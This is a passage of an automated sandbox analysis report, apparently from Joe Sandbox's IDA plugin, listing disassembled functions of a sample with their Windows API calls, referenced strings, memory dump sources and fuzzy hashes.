Function 00F5BE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00F5BF26
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F597E7), ref: 00F5BF82
LoadImageW.USER32 ref: 00F5BFBB
LoadImageW.USER32 ref: 00F5BFFE
LoadImageW.USER32 ref: 00F5C035
FreeLibrary.KERNEL32(?), ref: 00F5C041
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F5C051
DestroyIcon.USER32(?,?,?,?,?,00F597E7), ref: 00F5C060
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F5C07D
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F5C089

Part of subcall function 00EF312D: __wcsicmp_l.LIBCMT ref: 00EF31B6

Strings

.dll, xrefs: 00F5BEDF
.icl, xrefs: 00F5BE9C
.exe, xrefs: 00F5BEBC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 7a79424082e1276ea8eef84a6827da9cf2cbce8a5535bdbb3209062a8b9adef6
Instruction ID: b091af1e32c5900fc5ef37317013f2e8c5c4bd78a82351f3246644de157ce63d
Opcode Fuzzy Hash: 7a79424082e1276ea8eef84a6827da9cf2cbce8a5535bdbb3209062a8b9adef6
Instruction Fuzzy Hash: DE61E371900618FFEB14DF64DC45BBE77A8EB08721F204109FE25E61D1DBB4A984EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F3E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F3E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00F3E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F3E33B
__wsplitpath.LIBCMT ref: 00F3E399
_wcscat.LIBCMT ref: 00F3E3B1
_wcscat.LIBCMT ref: 00F3E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F3E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E43F
_wcscpy.LIBCMT ref: 00F3E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F3E48A

Strings

*.*, xrefs: 00F3E445

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 1d89818d3d8f9aa2917d4f6ab9dd3c5710125b3c46955fc3512475fa70ec2307
Instruction ID: 4d36905c2f9b78ddd5340bb63fb89ace6394eeb2ddb3d5d74cd00ee907627afd
Opcode Fuzzy Hash: 1d89818d3d8f9aa2917d4f6ab9dd3c5710125b3c46955fc3512475fa70ec2307
Instruction Fuzzy Hash: 98614AB65046459FCB10EF60C844A9FB3E8FF89320F04891EF99997291DB35E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F3A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F3A2C2

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F3A2E3
__swprintf.LIBCMT ref: 00F3A33C
__swprintf.LIBCMT ref: 00F3A355
_wprintf.LIBCMT ref: 00F3A3FC
_wprintf.LIBCMT ref: 00F3A41A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00F3A3F7
"%s" (%d) : ==> %s:, xrefs: 00F3A415
Incorrect parameters to object property !, xrefs: 00F3A39E
^ ERROR , xrefs: 00F3A391
Error: , xrefs: 00F3A3C4
Line %d (File "%s"):, xrefs: 00F3A336, 00F3A34F

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 0b963cc64af073c4802ad8b23a98ac90e9ca5ef743f83cfd85f01e75641f439e
Instruction ID: 6a8101d52723f32c75078d6f06c8b95ee0fa20a742a5ee6c4cd2200946c5157c
Opcode Fuzzy Hash: 0b963cc64af073c4802ad8b23a98ac90e9ca5ef743f83cfd85f01e75641f439e
Instruction Fuzzy Hash: 2951867190024DAACF14EBE1CD46EEEB7B9EF14350F200196F505B20A2EB756F98EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F30065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00F1F8B8,00000001,0000138C,00000001,00000000,00000001,?,00F43FF9,00000000), ref: 00F3009A
LoadStringW.USER32(00000000,?,00F1F8B8,00000001), ref: 00F300A3

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

GetModuleHandleW.KERNEL32(00000000,00F97310,?,00000FFF,?,?,00F1F8B8,00000001,0000138C,00000001,00000000,00000001,?,00F43FF9,00000000,00000001), ref: 00F300C5
LoadStringW.USER32(00000000,?,00F1F8B8,00000001), ref: 00F300C8
__swprintf.LIBCMT ref: 00F30118
__swprintf.LIBCMT ref: 00F30129
_wprintf.LIBCMT ref: 00F301D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F301E9

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00F301CD
^ ERROR, xrefs: 00F3017E
Line %d:, xrefs: 00F30123
Error: , xrefs: 00F301A0
Line %d (File "%s"):, xrefs: 00F30112

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: a60aaf17bb1c4be649a6f4c8a7ef3fa0a216c59e0122f2d0e6757bdb07384967
Instruction ID: 14609409e5b7310476c14f9c1011f098997f8c40eb9765bc137bbde1b515440d
Opcode Fuzzy Hash: a60aaf17bb1c4be649a6f4c8a7ef3fa0a216c59e0122f2d0e6757bdb07384967
Instruction Fuzzy Hash: E2414D7280015DAACF14FBE1CD96DEEB7B9AF54340F2001A6F605B2092EE756F48DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F3A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

CharLowerBuffW.USER32(?,?), ref: 00F3AA0E
GetDriveTypeW.KERNEL32 ref: 00F3AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3AB08

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

Strings

set cd door , xrefs: 00F3AAA9
open , xrefs: 00F3AA6A
close, xrefs: 00F3AA14
open, xrefs: 00F3AA35
closed, xrefs: 00F3AA22, 00F3AA2B
wait, xrefs: 00F3AAC5
close cd wait, xrefs: 00F3AAF3
type cdaudio alias cd wait, xrefs: 00F3AA86

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 146c6c47a768d87811467efb1b5d73288f1a9bee78626165379aefdff6c4304f
Instruction ID: f793adefaf10a0f13de40b71e4eab94afaf9c5d09f768e860f6ea39ecfb24546
Opcode Fuzzy Hash: 146c6c47a768d87811467efb1b5d73288f1a9bee78626165379aefdff6c4304f
Instruction Fuzzy Hash: F0516B711042499FC700EF11C88196AB3F5FF98768F10496DF895A72A2EB31EE06CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F3A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F3A852
__swprintf.LIBCMT ref: 00F3A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F3A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F3A8D6
_memset.LIBCMT ref: 00F3A8F5
_wcsncpy.LIBCMT ref: 00F3A931
DeviceIoControl.KERNEL32 ref: 00F3A966
CloseHandle.KERNEL32(00000000), ref: 00F3A971
RemoveDirectoryW.KERNEL32(?), ref: 00F3A97A
CloseHandle.KERNEL32(00000000), ref: 00F3A984

Strings

:, xrefs: 00F3A895
\??\%s, xrefs: 00F3A86E
\, xrefs: 00F3A88A

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 991681b6e2215d6acba03228ef8cb56bdc9833d6ad0ee2e4d66c976a56ce7747
Instruction ID: 0c360a0acbc566d16765875d6a3543a8b5bc329f5aadc682aa1aa1e67e3bc706
Opcode Fuzzy Hash: 991681b6e2215d6acba03228ef8cb56bdc9833d6ad0ee2e4d66c976a56ce7747
Instruction Fuzzy Hash: DF31D47190010EABDB219FA1DC49FFB73BCEF89710F2041B6F648E21A0EB7096449B25

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F5982C,?,?), ref: 00F5C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C0F7
GlobalLock.KERNEL32 ref: 00F5C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C10F
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C118
CloseHandle.KERNEL32(00000000,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00F63C7C,?), ref: 00F5C149
GlobalFree.KERNEL32 ref: 00F5C159
GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,00F5982C,?,?,00000000,?), ref: 00F5C17D
CopyImage.USER32 ref: 00F5C1A8
DeleteObject.GDI32(00000000), ref: 00F5C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F5C1E6

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 84d73522fa013b50650e3d3fbd2d8449a0f40b1282e7c15e90a9c1b59b565156
Instruction ID: 5dd0306f99bf4800b16b31aa5cf9490ad5219c9395fe4ccd9805a07f54d6a90c
Opcode Fuzzy Hash: 84d73522fa013b50650e3d3fbd2d8449a0f40b1282e7c15e90a9c1b59b565156
Instruction Fuzzy Hash: D2414C75500208FFCB219F64DC48EAB7BB8EF89722F204058FD16D72A0DBB09945EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F3DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00F3E053
_wcscat.LIBCMT ref: 00F3E06B
_wcscat.LIBCMT ref: 00F3E07D
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F3E092
SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E0A6
GetFileAttributesW.KERNEL32(?), ref: 00F3E0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00F3E0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00F3E0EA

Strings

*.*, xrefs: 00F3E129

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: d84327416345efbbadcd9303076337879cdcc1fbd4a6815c60638ccc55709f1a
Instruction ID: 1c8050f34035d92035f7321f393a3737130de66fd9d2a8e809b6552614f86a51
Opcode Fuzzy Hash: d84327416345efbbadcd9303076337879cdcc1fbd4a6815c60638ccc55709f1a
Instruction Fuzzy Hash: 1E8192B29042459FC724EF74D88496AB7E8FF98320F14882EF886D7251E730E945DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F5C8A4
GetFocus.USER32(?,?,?,?), ref: 00F5C8B4
GetDlgCtrlID.USER32 ref: 00F5C8BF
_memset.LIBCMT ref: 00F5C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F5CA15
GetMenuItemCount.USER32 ref: 00F5CA35
GetMenuItemID.USER32(?,00000000), ref: 00F5CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F5CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F5CAC4
CheckMenuRadioItem.USER32 ref: 00F5CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F5CB31

Strings

0, xrefs: 00F5C9E2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: fc496a6e6cd93beb9b41155bf08e7efbd690893db9c277dad3326ac78b65bfd8
Instruction ID: 53ee05597aaf32b08478a94d3c9097ab669007a26e876300f95c8c0bdff3caa6
Opcode Fuzzy Hash: fc496a6e6cd93beb9b41155bf08e7efbd690893db9c277dad3326ac78b65bfd8
Instruction Fuzzy Hash: 0B819F71608305AFD710DF14C885A6B7BE8FF88765F10451DFE96A3291C770D909EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F28ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F28E20: GetUserObjectSecurity.USER32 ref: 00F28E3C
Part of subcall function 00F28E20: GetLastError.KERNEL32(?,00F28900,?,?,?), ref: 00F28E46
Part of subcall function 00F28E20: GetProcessHeap.KERNEL32(00000008,?,?,00F28900,?,?,?), ref: 00F28E55
Part of subcall function 00F28E20: HeapAlloc.KERNEL32(00000000,?,00F28900,?,?,?), ref: 00F28E5C
Part of subcall function 00F28E20: GetUserObjectSecurity.USER32 ref: 00F28E73

Part of subcall function 00F28EBD: GetProcessHeap.KERNEL32(00000008,00F28916,00000000,00000000,?,00F28916,?), ref: 00F28EC9
Part of subcall function 00F28EBD: HeapAlloc.KERNEL32(00000000,?,00F28916,?), ref: 00F28ED0
Part of subcall function 00F28EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F28916,?), ref: 00F28EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F28B2E
_memset.LIBCMT ref: 00F28B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F28B62
GetLengthSid.ADVAPI32(?), ref: 00F28B73
GetAce.ADVAPI32(?,00000000,?), ref: 00F28BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F28BCC
GetLengthSid.ADVAPI32(?), ref: 00F28BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F28BF8
HeapAlloc.KERNEL32(00000000), ref: 00F28BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F28C20
CopySid.ADVAPI32(00000000), ref: 00F28C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F28C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F28C7E
SetUserObjectSecurity.USER32 ref: 00F28C92

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 075527f5b44e3268102cb0c38fbd42e87e507d916451c610849f3e93bb3e22ac
Instruction ID: e5c0e3632e2dc02466e336e5c6696e7b6defa53e0d04585d94446d4d2503f01b
Opcode Fuzzy Hash: 075527f5b44e3268102cb0c38fbd42e87e507d916451c610849f3e93bb3e22ac
Instruction Fuzzy Hash: B36168B1901219BFCF109FA0ED44EEEBB79FF04350F148169F925A6290DB759A06EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F47A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F47A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F47A85
CreateCompatibleDC.GDI32(?), ref: 00F47A91
SelectObject.GDI32(00000000,?), ref: 00F47A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F47AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F47B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F47B52
SelectObject.GDI32(00000006,?), ref: 00F47B5A
DeleteObject.GDI32(?), ref: 00F47B63
DeleteDC.GDI32(00000006), ref: 00F47B6A
ReleaseDC.USER32 ref: 00F47B75

Strings

(, xrefs: 00F47AFA

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 1268f18529acc9d8370e255eb815530a13e906506d6f2c2f88d093d5e705b7c7
Instruction ID: 56b78aa1410a8be7e44c1006f5c5024aafd8272557299a54d024fea331b16116
Opcode Fuzzy Hash: 1268f18529acc9d8370e255eb815530a13e906506d6f2c2f88d093d5e705b7c7
Instruction Fuzzy Hash: A6514872904309EFCB15DFA8CC85EAFBBB9EF48310F14841DF95AA7220D775A9419B60

Uniqueness

Uniqueness Score: -1.00%

Function 00F3A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00F3A4D4

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00F3A4F6
__swprintf.LIBCMT ref: 00F3A54F
__swprintf.LIBCMT ref: 00F3A568
_wprintf.LIBCMT ref: 00F3A61E
_wprintf.LIBCMT ref: 00F3A63C

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00F3A619
"%s" (%d) : ==> %s:, xrefs: 00F3A637
^ ERROR, xrefs: 00F3A5C0
Error: , xrefs: 00F3A5E6
Line %d (File "%s"):, xrefs: 00F3A549, 00F3A562

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 7659629ddf63d5ea9e28c841d80b9758068e9bc786fbc4cd1a367ece9b6067b6
Instruction ID: fc11da54248bea7b54f1834ecd0450403a03d2793ad2936e9693b494f5eb0712
Opcode Fuzzy Hash: 7659629ddf63d5ea9e28c841d80b9758068e9bc786fbc4cd1a367ece9b6067b6
Instruction Fuzzy Hash: 6A51927190024DABCF14EBE1CD46EEEB7B9AF14350F200166F505B20A2EB356F98EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F39710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F3951A: __time64.LIBCMT ref: 00F39524

Part of subcall function 00EE4A8C: _fseek.LIBCMT ref: 00EE4AA4

__wsplitpath.LIBCMT ref: 00F397EF

Part of subcall function 00EF431E: __wsplitpath_helper.LIBCMT ref: 00EF435E

_wcscpy.LIBCMT ref: 00F39802
_wcscat.LIBCMT ref: 00F39815
__wsplitpath.LIBCMT ref: 00F3983A
_wcscat.LIBCMT ref: 00F39850
_wcscat.LIBCMT ref: 00F39863

